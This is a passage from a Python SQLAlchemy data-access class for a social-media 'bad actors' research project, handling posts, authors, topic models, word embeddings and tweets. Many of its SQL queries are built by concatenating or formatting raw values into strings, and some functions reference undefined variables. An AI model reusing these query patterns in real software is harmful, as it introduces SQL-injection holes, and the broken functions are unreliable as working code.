author_classify_dict[author_name]\n\n post_type = post.post_type\n if post_type is not None:\n targeted_classes = post_type.split('/')\n author_sub_type = targeted_classes[0]\n if author_sub_type is not None:\n author.author_sub_type = author_sub_type\n\n if author_guid in author_prop_dict:\n for key, value in author_prop_dict[author_guid].items():\n setattr(author, key, value)\n\n authors_to_update.append(author)\n author_dict[author_guid] = author\n\n if len(posts) != 0: print(\"\")\n # self.add_authors(authors_to_update)\n self.session.bulk_save_objects(authors_to_update)\n self.session.commit()\n\n def get_posts_filtered_by_domain(self, domain):\n entries = self.session.query(Post).filter(Post.domain == domain).all()\n return entries\n\n def get_instagram_posts_without_comments(self):\n connection_type = 'post_comment_connection'\n query = text(\"\"\"\n SELECT *\n FROM posts\n WHERE posts.post_type = 'post'\n AND posts.domain = 'Instagram'\n AND posts.retweet_count > 0\n AND posts.post_id NOT IN (SELECT source_author_guid\n FROM author_connections\n WHERE connection_type = :connection_type)\n \"\"\")\n\n result = self.session.execute(query, params=dict(connection_type=connection_type))\n posts_dicts = list(map(dict, result))\n posts = [Post(**post_dict) for post_dict in posts_dicts]\n return posts\n\n def get_author_guids(self):\n result = self.session.query(Author.author_guid).all()\n ids = [res[0] for res in result]\n return ids\n\n def delete_anchor_authors(self):\n query = \"\"\"\n DELETE\n FROM anchor_authors\n \"\"\"\n query = text(query)\n self.session.execute(query)\n self.commit()\n\n def insert_anchor_author(self, author_guid, author_type):\n anchor_author = AnchorAuthor(author_guid, author_type)\n self.session.merge(anchor_author)\n self.session.commit()\n\n def get_anchor_authors(self):\n query = \"\"\" SELECT author_guid, author_type\n FROM anchor_authors \"\"\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n return cursor\n\n def get_random_authors_for_graphs(self):\n query = \"\"\"\n SELECT author_guid, author_type\n FROM random_authors_for_graphs\n \"\"\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n random_authors_for_graphs = self.result_iter(cursor)\n return random_authors_for_graphs\n\n # def get_author_types(self, domain):\n # author_type = {}\n # query = \"SELECT author_guid, author_type FROM authors where author_guid is not null and domain={0}\".format(domain)\n # query = text(query)\n # result = self.session.execute(query)\n # authors = self.result_iter(result.cursor)\n # for author in authors:\n # author_type[author[0]]=author[1]\n # return author_type\n\n def create_author_dictionaries(self, index_field_for_predictions, domain):\n labeled_author_dict = {}\n unlabeled_author_dict = {}\n # author_guid - author_screen_name\n unlabeled_author_guid_index_field_dict = {}\n query = \"SELECT author_guid, {0}, author_type FROM authors where author_guid is not null and domain='{1}'\".format(\n index_field_for_predictions, domain)\n # query = \"\"\"\n # SELECT author_guid, author_type FROM authors where author_guid is not null and domain = '\" +domain + \"'\n # \"\"\"\n query = text(query)\n result = self.session.execute(query)\n authors = self.result_iter(result.cursor)\n for author in authors:\n author_guid = author[0]\n index_field_for_predictions = author[1]\n targeted_class = author[2]\n\n if targeted_class is not None:\n labeled_author_dict[author_guid] = targeted_class\n print(\"{0} - {1}\".format(author_guid, targeted_class))\n else:\n unlabeled_author_dict[author_guid] = targeted_class\n unlabeled_author_guid_index_field_dict[author_guid] = index_field_for_predictions\n return labeled_author_dict, unlabeled_author_dict, unlabeled_author_guid_index_field_dict\n\n def get_author_guid_by_targeted_field_name_and_targeted_class(self, targeted_field_name, targeted_class):\n query = \"SELECT authors.author_guid FROM authors WHERE authors\"\n query += \".\" + targeted_field_name + \" = \" + \"'\" + targeted_class + \"'\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n return cursor\n\n def create_author_feature(self, author_guid, attribute_name, attribute_value):\n author_feature = AuthorFeatures()\n\n author_feature.author_guid = author_guid\n author_feature.attribute_name = attribute_name\n author_feature.attribute_value = str(attribute_value)\n author_feature.window_start = self._window_start\n author_feature.window_end = self._window_end\n\n msg = '\\r adding ' + 'author_guid:' + author_guid + ' attribute_name: ' + attribute_name + ' attribute_value: ' + str(\n attribute_value)\n print(msg, end=\"\")\n\n return author_feature\n\n def delete_anchor_author_features(self):\n query = \"\"\"\n DELETE\n FROM author_features\n WHERE author_features.author_guid IN (\n\t SELECT anchor_authors.author_guid\n\t FROM anchor_authors\n )\n \"\"\"\n query = text(query)\n self.session.execute(query)\n self.commit()\n\n def create_temp_author_connections(self, source_author_id, destination_author_ids, author_connection_type,\n insertion_date):\n print(\"---create_temp_author_connections---\")\n author_connections = []\n for destination_author_id in destination_author_ids:\n author_connection = self.create_temp_author_connection(source_author_id, destination_author_id,\n author_connection_type, insertion_date)\n author_connections.append(author_connection)\n\n return author_connections\n\n def create_temp_author_connection(self, source_author_id, destination_author_id, connection_type, insertion_date):\n temp_author_connection = TempAuthorConnection()\n msg = '\\r \"Temp author connection: source -> ' + str(source_author_id) + ', dest -> ' + str(\n destination_author_id) + ', connection type = ' + connection_type\n print(msg, end=\"\")\n # print(\"Temp author connection: source -> \" + str(source_author_id) + \", dest -> \" + str(\n # destination_author_id) + \", connection type = \" + connection_type)\n temp_author_connection.source_author_osn_id = source_author_id\n temp_author_connection.destination_author_osn_id = destination_author_id\n temp_author_connection.connection_type = str(connection_type)\n temp_author_connection.insertion_date = insertion_date\n\n return temp_author_connection\n\n def get_temp_author_connections(self):\n query = \"\"\"\n SELECT temp_author_connections.source_author_osn_id, temp_author_connections.destination_author_osn_id,\n temp_author_connections.connection_type, temp_author_connections.insertion_date\n FROM temp_author_connections\n \"\"\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n return cursor\n\n def delete_temp_author_connections(self, temp_author_connections):\n total = len(temp_author_connections)\n current = 0\n for author_connection in temp_author_connections:\n current += 1\n msg = '\\r adding ' + str(current) + ' of ' + str(total) + ' author_connections'\n print(msg, end=\"\")\n self.delete_temp_author_connection(author_connection)\n self.session.commit()\n\n def delete_temp_author_connection(self, temp_author_connection):\n query = \"\"\"\n DELETE FROM temp_author_connections\n WHERE source_author_osn_id = :source_id\n AND destination_author_osn_id = :destination_id\n AND connection_type = :connection_type\n \"\"\"\n query = text(query)\n self.session.execute(query, params=dict(source_id=temp_author_connection.source_author_osn_id,\n destination_id=temp_author_connection.destination_author_osn_id,\n connection_type=temp_author_connection.connection_type))\n\n def create_post_retweeter_connections(self, post_id, retweeter_ids):\n post_retweeter_connections = []\n retweeter_connection_type = str(\"post_retweeter\")\n for retweeter_id in retweeter_ids:\n post_retweeter_connection = self.create_post_retweeter_connection(post_id, retweeter_id,\n retweeter_connection_type)\n post_retweeter_connections.append(post_retweeter_connection)\n\n return post_retweeter_connections\n\n def create_post_retweeter_connection(self, post_id, retweeter_id, connection_type):\n post_retweeter_connection = PostRetweeterConnection()\n\n post_retweeter_connection.post_osn_id = post_id\n post_retweeter_connection.retweeter_twitter_id = retweeter_id\n post_retweeter_connection.connection_type = str(connection_type)\n post_retweeter_connection.insertion_date = str(get_current_time_as_string())\n\n return post_retweeter_connection\n\n def convert_temp_author_connections_to_author_connections(self, domain):\n cursor = self.get_temp_author_connections()\n temp_author_connection_tuples = self.result_iter(cursor)\n\n author_osn_id_author_guid_dict = self.create_author_osn_id_author_guid_dictionary(domain)\n\n author_connections = []\n already_converted_temp_author_connections = []\n for temp_author_connection in temp_author_connection_tuples:\n source_author_osn_id = temp_author_connection[0]\n destination_author_osn_id = temp_author_connection[1]\n connection_type = temp_author_connection[2]\n insertion_date = temp_author_connection[3]\n\n if source_author_osn_id in author_osn_id_author_guid_dict and destination_author_osn_id in author_osn_id_author_guid_dict:\n source_author_guid = author_osn_id_author_guid_dict[source_author_osn_id]\n destination_author_guid = author_osn_id_author_guid_dict[destination_author_osn_id]\n\n author_connection = self.create_author_connection(source_author_guid, destination_author_guid, 0,\n connection_type, insertion_date)\n already_convert_temp_author_connection = self.create_temp_author_connection(source_author_osn_id,\n destination_author_osn_id,\n connection_type,\n insertion_date)\n\n author_connections.append(author_connection)\n already_converted_temp_author_connections.append(already_convert_temp_author_connection)\n self.save_author_connections(author_connections)\n self.delete_temp_author_connections(already_converted_temp_author_connections)\n\n def create_author_osn_id_author_guid_dictionary(self, domain):\n author_osn_id_author_guid_dict = {}\n authors = self.get_authors_by_domain(domain)\n for author in authors:\n author_osn_id = author.author_osn_id\n author_guid = author.author_guid\n author_osn_id_author_guid_dict[author_osn_id] = author_guid\n return author_osn_id_author_guid_dict\n\n def get_topic_with_maximal_posts(self):\n query = \"\"\"\n SELECT res.topic_id, MAX(res.post_count)\n FROM (\n SELECT topic_stats.topic_id, topic_stats.post_count\n FROM topic_stats\n GROUP BY 1\n ORDER BY 2 DESC\n ) res\n \"\"\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n generator = self.result_iter(cursor)\n for tuple in generator:\n return tuple\n\n def get_top_terms_by_topic_id(self, topic_id):\n query = \"\"\"\n SELECT topics.term_id, terms.description, topics.probability\n FROM topics\n INNER JOIN terms ON (terms.term_id = topics.term_id)\n WHERE topics.topic_id = {}\n ORDER BY 3 DESC\n LIMIT 100\n \"\"\".format(topic_id)\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n generator = self.result_iter(cursor)\n top_terms = [term[1] for term in generator]\n return top_terms\n\n def get_top_10_terms_by_topic_id(self, topic_id):\n query = \"\"\"\n SELECT topics.term_id, terms.description, topics.probability\n FROM topics\n INNER JOIN terms ON (terms.term_id = topics.term_id)\n WHERE topics.topic_id = {}\n ORDER BY 3 DESC\n LIMIT 10\n \"\"\".format(topic_id)\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n generator = self.result_iter(cursor)\n top_terms = [term[1] for term in generator]\n return top_terms\n\n def create_post_from_tweet_data(self, tweet_data, domain):\n author_name = tweet_data.user.screen_name\n tweet_author_guid = compute_author_guid_by_author_name(author_name)\n tweet_post_twitter_id = str(tweet_data.id)\n tweet_url = generate_tweet_url(tweet_post_twitter_id, author_name)\n tweet_creation_time = tweet_data.created_at\n tweet_str_publication_date = extract_tweet_publiction_date(tweet_creation_time)\n tweet_guid = compute_post_guid(post_url=tweet_url, author_name=author_name,\n str_publication_date=tweet_str_publication_date)\n\n media_path = None\n if tweet_data.media is not None:\n if tweet_data.media[0] is not None:\n media_url = tweet_data.media[0].media_url\n media_path = str(media_url)\n post = Post(guid=tweet_guid, post_id=tweet_guid, url=str(tweet_url),\n date=str_to_date(tweet_str_publication_date),\n title=str(tweet_data.text), content=str(tweet_data.text),\n post_osn_id=tweet_post_twitter_id,\n author=str(author_name), author_guid=str(tweet_author_guid),\n domain=str(domain),\n media_path=media_path,\n retweet_count=str(tweet_data.retweet_count),\n favorite_count=str(tweet_data.favorite_count),\n timeline_importer_insertion_date=str(get_current_time_as_string()))\n return post\n\n def get_max_topic(self):\n query = \"\"\"\n SELECT MAX(topics.topic_id)\n FROM topics\n \"\"\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n rows = cursor.fetchall()\n max_topic = rows[0][0]\n return max_topic\n\n def _get_top_terms_by_topic_id(self, topic_id, num_of_top_terms):\n query = \"\"\"\n SELECT topics.topic_id, terms.description, topics.probability\n FROM topics\n INNER JOIN terms on (topics.term_id = terms.term_id)\n WHERE topics.topic_id = {0}\n ORDER BY topics.probability DESC\n LIMIT {1}\n \"\"\".format(topic_id, num_of_top_terms)\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = cursor.fetchall()\n\n top_terms = [tuple[1] for tuple in tuples]\n return top_terms\n\n def _randomize_authors(self, min_posts_count, domain, num_of_random_authors):\n query = \"\"\"\n SELECT authors.author_guid, authors.author_type\n FROM authors\n INNER JOIN author_guid_num_of_posts_view ON (author_guid_num_of_posts_view.author_guid = authors.author_guid)\n WHERE author_guid_num_of_posts_view.num_of_posts >= :min_posts_count\n AND authors.domain = :domain\n ORDER BY RANDOM()\n LIMIT :num_of_random_authors\n \"\"\"\n query = text(query)\n result = self.session.execute(query, params=dict(min_posts_count=min_posts_count, domain=domain,\n num_of_random_authors=num_of_random_authors))\n cursor = result.cursor\n randomized_authors_for_graph = self.result_iter(cursor)\n return randomized_authors_for_graph\n\n def _create_randomized_author_for_graph(self, author_guid, author_type):\n randomized_author_for_graph = RandomAuthorForGraph()\n randomized_author_for_graph.author_guid = author_guid\n randomized_author_for_graph.author_type = author_type\n return randomized_author_for_graph\n\n def randomize_authors_for_graph(self, min_posts_count, domain, num_of_random_authors_for_graph):\n randomized_authors = []\n randomized_authors_for_graph = self._randomize_authors(min_posts_count, domain, num_of_random_authors_for_graph)\n for author_guid, author_type in randomized_authors_for_graph:\n randomized_author_for_graph = self._create_randomized_author_for_graph(author_guid, author_type)\n randomized_authors.append(randomized_author_for_graph)\n\n def deleteTopics(self, window_start=None):\n if window_start:\n self.session.query(Topic).filter(Topic.window_start == window_start).delete()\n self.session.query(Post_to_topic).filter(Post_to_topic.window_start == window_start).delete()\n else:\n self.session.query(Topic).delete()\n self.session.query(Post_to_topic).delete()\n self.session.commit()\n\n def addTopics(self, topics):\n for topic in topics:\n self.addTopic(topic)\n self.session.commit()\n\n def addTopic(self, topic):\n self.session.merge(topic)\n\n def addPostTopicMapping(self, topic_mapping):\n self.session.merge(topic_mapping)\n\n def addPostTopicMappings(self, post_topic_mappings):\n for i, topic_mapping in enumerate(post_topic_mappings):\n self.addPostTopicMapping(topic_mapping)\n if i % 100 == 0:\n msg = \"\\rAdd post topic mappings {0}/{1}\".format(str(i), str(len(post_topic_mappings)))\n print(msg, end='')\n msg = \"\\rAdd post topic mappings {0}/{1}\".format(str(len(post_topic_mappings)), str(len(post_topic_mappings)))\n print(msg, end='')\n self.session.commit()\n\n def add_terms(self, terms):\n for term in terms:\n self.add_term(term)\n self.session.commit()\n\n def add_term(self, term):\n self.session.merge(term)\n\n def add_topic_items(self, topic_items):\n for topic_item in topic_items:\n self.add_topic_item(topic_item)\n self.session.commit()\n\n def add_topic_item(self, topic_item):\n self.session.merge(topic_item)\n\n def create_author_topic_mapping_table(self, number_of_topics):\n query = \"\"\"\n CREATE TABLE IF NOT EXISTS author_topic_mapping (\n author_guid text NOT NULL,\n {0}\n CONSTRAINT PK_Person PRIMARY KEY (author_guid)\n FOREIGN KEY (author_guid) REFERENCES authors(author_guid));\n \"\"\"\n topics = \"\"\n for i in range(number_of_topics):\n topics += \"'{0}' int NOT NULL,\\n\".format(i)\n query = query.format(topics)\n query = text(query)\n self.session.execute(query)\n\n def insert_into_author_toppic_mapping(self, author_guid, author_mapping):\n\n query = \"\"\"\n INSERT INTO author_topic_mapping \n VALUES ('{0}',{1});\n \"\"\"\n author_mapping = ','.join([str(m) for m in author_mapping])\n\n query = query.format(author_guid, author_mapping)\n query = text(query)\n self.session.execute(query)\n\n def insert_into_author_toppic_mappings(self, mappings):\n if len(mappings) > 0:\n author_mappings = []\n author_guids = []\n for author_guid, author_mapping in mappings:\n mapping_tamplate = \"('{0}',{1})\"\n author_mapping = ','.join([str(m) for m in author_mapping])\n author_mappings.append(mapping_tamplate.format(author_guid, author_mapping))\n author_guids.append(\"'{0}'\".format(author_guid))\n\n self.delete_author_topic_mapping_by_author_guids(author_guids)\n\n for i in range(int(len(mappings) / 10000 + 1)):\n author_topic_mapping_count = str(min((i + 1) * 10000, len(mappings)))\n print('\\r add author_topic_mappings {}/{}'.format(author_topic_mapping_count, len(mappings)), end='')\n query = \"\"\" \n INSERT INTO author_topic_mapping \n VALUES {0};\n \"\"\"\n query = query.format(',\\n'.join(author_mappings[i * 10000: (i + 1) * 10000]))\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n print()\n\n def delete_author_topic_mapping_by_author_guids(self, author_guids):\n query = \"\"\"\n DELETE FROM author_topic_mapping\n WHERE author_guid IN ({0});\n \"\"\"\n query = query.format(','.join(author_guids))\n query = text(query)\n self.session.execute(query)\n\n def delete_terms(self):\n self.session.query(Term).delete()\n self.session.commit()\n\n def delete_post_topic_mapping(self):\n self.session.query(PostTopicMapping).delete()\n self.session.commit()\n\n def delete_author_topic_mapping(self):\n query = \"\"\"\n DROP TABLE IF EXISTS author_topic_mapping;\n \"\"\"\n query = text(query)\n self.session.execute(query)\n\n def get_terms(self):\n return self.session.query(Term).all()\n\n def get_author_topic_mapping(self):\n query = \"\"\"\n SELECT * FROM author_topic_mapping\n \"\"\"\n query = text(query)\n result = self.session.execute(query)\n return result.cursor.fetchall()\n\n def get_post_topic_mapping(self):\n return self.session.query(PostTopicMapping).all()\n\n def get_number_of_topics(self):\n return self.session.execute(\"select count(distinct( topic_id)) from topics\").scalar()\n\n @staticmethod\n def create_post_topic_mapping_obj(max_topic_probability, post_id):\n ptm = PostTopicMapping()\n ptm.post_id = post_id\n ptm.max_topic_dist = float(max_topic_probability[1])\n ptm.max_topic_id = int(max_topic_probability[0])\n return ptm\n\n @staticmethod\n def create_topic_item(topic_id, term_id, probability):\n topic_obj = Topic()\n topic_obj.topic_id = topic_id\n topic_obj.term_id = term_id\n topic_obj.probability = probability\n return topic_obj\n\n @staticmethod\n def create_term(term_id, term_description):\n term = Term()\n term.term_id = term_id\n term.description = term_description\n return term\n\n def get_targeted_articles(self):\n targetd_articles = self.session.query(Target_Article).all()\n return targetd_articles\n\n def get_targeted_article_items(self):\n targetd_articles = self.session.query(Target_Article_Item).all()\n return targetd_articles\n\n def get_text_images(self):\n text_images = self.session.query(Text_From_Image).all()\n return text_images\n\n def get_authors_with_media(self):\n query = \"\"\"SELECT authors.name, authors.media_path FROM authors\n WHERE authors.media_path IS NOT NULL\"\"\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n return tuples\n\n def get_authors_and_image_tags(self):\n query = \"\"\"SELECT * FROM image_tags\"\"\"\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n return tuples\n\n def get_post_id_to_author_guid_mapping(self):\n query = \"\"\"\n SELECT posts.author_guid, posts.post_id \n FROM posts\n \"\"\"\n result = self.session.execute(query)\n cursor = result.cursor\n records = self.result_iter(cursor)\n records = list(records)\n\n return {record[1]: record[0] for record in records}\n\n def get_author_guid_word_embedding_vector_dict(self, word_embedding_table_name, table_name, targeted_field_name,\n word_embedding_type):\n query = self._get_author_guid_word_embedding_vector_full_query(word_embedding_table_name, table_name,\n targeted_field_name, word_embedding_type)\n result = self.session.execute(query, params=dict(word_embedding_table_name=word_embedding_table_name,\n table_name=table_name, targeted_field_name=targeted_field_name,\n word_embedding_type=word_embedding_type))\n return self._create_author_guid_word_embedding_vector_dict_by_query(result)\n\n def get_random_author_guid_word_embedding_vector_dict(self, table_name, targeted_field_name, word_embedding_type,\n num_of_random_authors_for_graph):\n query = self._get_random_author_guid_word_embedding_vector_full_query(table_name, targeted_field_name,\n word_embedding_type,\n num_of_random_authors_for_graph)\n result = self.session.execute(query, params=dict(word_embedding_table_name=word_embedding_table_name,\n table_name=table_name, targeted_field_name=targeted_field_name,\n word_embedding_type=word_embedding_type,\n num_of_random_authors_for_graph=num_of_random_authors_for_graph))\n return self._create_author_guid_word_embedding_vector_dict_by_query(result)\n\n def _get_word_embeddings_types(self, author_word_embeddings=\"author_word_embeddings\"):\n query = \"SELECT word_embedding_type from %s GROUP BY 1\" % author_word_embeddings\n result = self.session.execute(query).fetchall()\n parsed = [col[0] for col in result]\n return parsed\n\n def _get_author_guid_word_embedding_vector_full_query(self, word_embedding_table_name, table_name,\n targeted_field_name, word_embedding_type):\n query = \"\"\"\n SELECT *\n FROM {0}\n WHERE table_name = '{1}'\n AND targeted_field_name = '{2}'\n AND word_embedding_type = '{3}'\n AND author_id IS NOT NULL\n \"\"\".format(word_embedding_table_name, table_name, targeted_field_name, word_embedding_type)\n return query\n\n def _get_random_author_guid_word_embedding_vector_full_query(self, word_embedding_table_name, table_name,\n targeted_field_name, word_embedding_type,\n num_of_random_authors_for_graph):\n query = \"\"\"\n SELECT *\n FROM {0}\n WHERE table_name = '{1}'\n AND targeted_field_name = '{2}'\n AND word_embedding_type = '{3}'\n AND author_id IS NOT NULL\n LIMIT {4}\n \"\"\".format(word_embedding_table_name, table_name, targeted_field_name, word_embedding_type,\n num_of_random_authors_for_graph)\n return query\n\n def _create_author_guid_word_embedding_vector_dict_by_query(self, result):\n cursor = result.cursor\n records = self.result_iter(cursor)\n # records = list(records)\n return self.create_author_guid_word_embedding_dict_by_recoreds(records)\n\n def create_author_guid_word_embedding_dict_by_recoreds(self, records):\n author_guid_word_embedding_vector = {}\n for record in records:\n author_guid = record[0]\n selected_table_name = record[1]\n selected_targeted_field_name = record[3]\n selected_word_embedding_type = record[4]\n vector = record[5:]\n # vector_str = np.array(vector_str)\n # vector = vector_str.astype(np.float)\n author_guid_word_embedding_vector[author_guid] = vector\n return author_guid_word_embedding_vector\n\n def get_word_embedding_dictionary(self):\n query = \"\"\"SELECT * FROM wikipedia_model_300d\"\"\"\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n records = list(tuples)\n ans = {record[0]: record[1:301] for record in records}\n return ans\n\n def get_author_word_embedding_table(self):\n query = \"\"\"SELECT * FROM author_word_embeddings\"\"\"\n query = self.session.execute(query)\n results = pd.read_sql_table('author_word_embeddings', self.engine)\n return results\n\n def get_author_word_embedding(self, author_guid, table_name, target_field_name, author_word_embeddings):\n ans = {}\n columns = self._get_word_embeddings_types(author_word_embeddings)\n ans = {str(col): self.get_author_guid_word_embedding_vector_dict(author_word_embeddings, table_name,\n target_field_name, col)[author_guid] for\n col in columns}\n # ans[u'min'] = self.get_author_guid_word_embedding_vector_dict(table_name, target_field_name, u'min')[author_guid]\n # ans[u'max'] = self.get_author_guid_word_embedding_vector_dict(table_name, target_field_name, u'max')[author_guid]\n # ans[u'np.mean'] = self.get_author_guid_word_embedding_vector_dict(table_name, target_field_name, u'np.mean')[author_guid]\n return ans\n\n def get_records_by_id_targeted_field_and_table_name(self, id_field, targeted_field_name, table_name, where_clauses):\n query = \"\"\"\n SELECT {0}, {1}\n FROM {2}\n \"\"\".format(id_field, targeted_field_name, table_name)\n\n is_first_condition = False\n for where_clause_dict in where_clauses:\n field_name = where_clause_dict['field_name']\n value = where_clause_dict['value']\n if is_first_condition == False:\n condition_clause = \"\"\"\n WHERE {0} = {1}\n \"\"\".format(field_name, value)\n is_first_condition = True\n else:\n condition_clause = \"\"\"\n AND {0} = {1}\n \"\"\".format(field_name, value)\n query += condition_clause\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n return tuples\n\n def get_word_vector_dictionary(self, table_name):\n query = \"\"\"\n SELECT *\n FROM {0}\n \"\"\".format(table_name)\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n\n word_vector_dict = defaultdict()\n for tuple in tuples:\n word = tuple[0]\n vector = tuple[1:]\n word_vector_dict[word] = vector\n return word_vector_dict\n\n def fill_author_type_by_post_type(self):\n logging.info(\"fill_author_type_by_post_type\")\n query = 'UPDATE authors SET author_type = (SELECT post_type FROM posts where posts.author_guid = authors.author_guid)'\n query = text(query)\n try:\n self.session.execute(query)\n except Exception as exc:\n logging.error(\"Fillin author type by post type failed\")\n finally:\n self.session.commit()\n\n def get_item_by_targeted_fields_dict_and_id(self, targeted_fields_dict, id_val):\n query = \"SELECT * FROM \" + targeted_fields_dict['table_name'] + \" where \" + targeted_fields_dict[\n 'id_field'] + \" = '\" + id_val + \"'\"\n result = self.session.execute(query)\n cursor = result.cursor\n\n result = cursor.fetchall()[0]\n return result\n\n def get_dict_idfield_to_item(self, targeted_fields_dict):\n id_field = targeted_fields_dict['id_field']\n query = 'select * from ' + targeted_fields_dict['table_name']\n answer = self.session.execute(text(query))\n return dict((getattr(item, id_field), item) for item in self.result_iter(answer))\n\n def get_author_id_by_field_id(self, field_id, id_val):\n if field_id == \"post_id\":\n query = 'SELECT author_guid FROM posts WHERE post_id=' + id_val\n answer = self.session.execute(text(query))\n cursor = answer.cursor\n result = cursor.fetchall()[0]\n return result[0]\n if field_id == \"author_guid\":\n return id_val\n\n def get_liar_dataset_records(self):\n liar_dataset_records = self.session.query(Politifact_Liar_Dataset).all()\n return liar_dataset_records\n\n def randomize_authors(self, min_number_of_posts_per_author, domain, authors_table_field_name,\n authors_table_value, num_of_random_authors):\n randomized_authors = []\n randomized_authors_for_graph = self._randomize_authors_by_conditions(min_number_of_posts_per_author,\n domain, authors_table_field_name,\n authors_table_value,\n num_of_random_authors)\n for author_guid, author_type in randomized_authors_for_graph:\n randomized_author_for_graph = self._create_randomized_author_for_graph(author_guid, author_type)\n randomized_authors.append(randomized_author_for_graph)\n\n self.addPosts(randomized_authors)\n\n def _randomize_authors_by_conditions(self, min_posts_count, domain, authors_table_field_name,\n authors_table_value, num_of_random_authors):\n\n query = \"\"\"\n SELECT authors.author_guid, authors.author_type\n FROM authors\n INNER JOIN author_guid_num_of_posts_view ON (author_guid_num_of_posts_view.author_guid = authors.author_guid)\n WHERE author_guid_num_of_posts_view.num_of_posts >= {0}\n AND authors.domain = '{1}'\n AND authors.{2} = '{3}'\n ORDER BY RANDOM()\n LIMIT {4}\n \"\"\".format(min_posts_count, domain, authors_table_field_name, authors_table_value,\n num_of_random_authors)\n query = text(query)\n result = self.session.execute(query, params=dict(min_posts_count=min_posts_count, domain=domain,\n num_of_random_authors=num_of_random_authors))\n cursor = result.cursor\n randomized_authors_for_graph = self.result_iter(cursor)\n return randomized_authors_for_graph\n\n def get_author_screen_name_author_guid_dictionary(self):\n query = \"\"\"\n SELECT authors.author_screen_name, authors.author_guid\n FROM authors\n \"\"\"\n query = text(query)\n\n result = self.session.execute(query, params=dict(domain=domain))\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n author_screen_name_author_guid_dict = {}\n for tuple in tuples:\n author_screen_name = tuple[0]\n author_guid = tuple[1]\n author_screen_name_author_guid_dict[author_screen_name] = author_guid\n return author_screen_name_author_guid_dict\n\n def get_resturant_api_id_to_resturant_dict(self):\n authors = self.get_all_authors()\n authors_dict = dict((str(aut.author_guid).encode('utf-8'), aut) for aut in authors)\n return authors_dict\n\n def fix_guids_encoding(self):\n guids = self.get_author_guids()\n for guid in guids:\n new_guid = str(guid).encode('ascii', 'ignore').decode('ascii')\n update_query = \"UPDATE \" + self.authors + \" SET author_guid ='\" + new_guid + \"' WHERE author_guid ='\" + guid + \"'\"\n self.update_query(update_query)\n\n def get_politifact_speaker_by_author(self, author):\n query = text(\"SELECT party_affiliation FROM politifact_liar_dataset where post_guid ='\" + author + \"'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())[0]\n return records\n\n def export_word_embeddings_to_tsv(self):\n embeddings_dict = self.get_author_guid_word_embedding_vector_dict('posts', 'content', 'max')\n file = open(\"D:\\\\Work\\\\BadActorsFolder\\\\trunk\\\\software\\\\bad_actors\\\\data\\\\output\\\\word_embeddings_mean2.tsv\",\n 'wb')\n file_labled = open(\n \"D:\\\\Work\\\\BadActorsFolder\\\\trunk\\\\software\\\\bad_actors\\\\data\\\\output\\\\word_embeddings_mean_lables.tsv\",\n 'wb')\n writer = csv.writer(file, delimiter='\\t')\n counter = 0\n for author in embeddings_dict:\n record = embeddings_dict[author]\n counter += 1\n str_record = str(record)[1:-1]\n str_record = str_record.replace(', ', '\\t')\n file.write(str_record + '\\n')\n\n author_type = (self.get_author_by_guid(author)).author_type\n author = self.get_politifact_speaker_by_author(author)[0]\n\n file_labled.write(author + '\\t' + author_type + '\\n')\n file.close()\n file_labled.close()\n\n ##\n ## Added for solving the issue of US Elections\n ##\n\n def convert_tweets_to_posts_and_authors(self, tweets, domain):\n posts = []\n authors = []\n for tweet in tweets:\n post, author = self._convert_tweet_to_post_and_author(tweet, domain)\n posts.append(post)\n authors.append(author)\n\n posts = list(set(posts))\n authors = list(set(authors))\n return posts, authors\n\n def _convert_tweet_to_post_and_author(self, tweet, domain):\n post = self._convert_tweet_to_post(tweet, domain)\n author = self._convert_tweet_to_author(tweet, domain)\n\n return post, author\n\n def convert_tweet_to_user_mentions(self, tweet, post_guid):\n tweet_user_mentions = tweet.user_mentions\n user_mentions = []\n for tweet_user_mention in tweet_user_mentions:\n user_mention = PostUserMention()\n\n user_mention.post_guid = post_guid\n user_mention.user_mention_twitter_id = tweet_user_mention.id_str\n user_mention.user_mention_screen_name = tweet_user_mention.screen_name\n\n user_mentions.append(user_mention)\n return user_mentions\n\n def _convert_tweet_to_post(self, tweet, domain):\n post = Post()\n\n tweet_id = tweet.id_str\n post.post_osn_id = tweet_id\n post.retweet_count = tweet.retweet_count\n post.favorite_count = tweet.favorite_count\n post.content = tweet.text\n\n user = tweet.user\n screen_name = user.screen_name\n post.author = screen_name\n\n url = \"https://twitter.com/{0}/status/{1}\".format(screen_name, tweet_id)\n post.url = url\n\n created_at = tweet.created_at\n post.created_at = created_at\n tweet_str_publication_date = str(extract_tweet_publiction_date(created_at))\n tweet_creation_date = str_to_date(tweet_str_publication_date)\n post.date = tweet_creation_date\n post.domain = domain\n\n post_guid = compute_post_guid(url, screen_name, tweet_str_publication_date)\n post.post_id = post_guid\n post.guid = post_guid\n\n author_guid = compute_author_guid_by_author_name(screen_name)\n post.author_guid = author_guid\n post.post_format = tweet.lang\n return post\n\n def _convert_tweet_to_author(self, tweet, domain):\n\n author = Author()\n\n user = tweet.user\n screen_name = user.screen_name\n author_guid = compute_author_guid_by_author_name(screen_name)\n\n author.author_guid = author_guid\n author.name = screen_name\n author.author_screen_name = screen_name\n author.created_at = user.created_at\n author.description = user.description\n author.favourites_count = user.favourites_count\n author.followers_count = user.followers_count\n author.friends_count = user.friends_count\n author.statuses_count = user.statuses_count\n\n author.geo_enabled = user.geo_enabled\n\n user_id = user.id_str\n author.author_osn_id = user_id\n author.language = user.lang\n author.listed_count = user.listed_count\n author.profile_background_color = user.profile_background_color\n author.profile_image_url 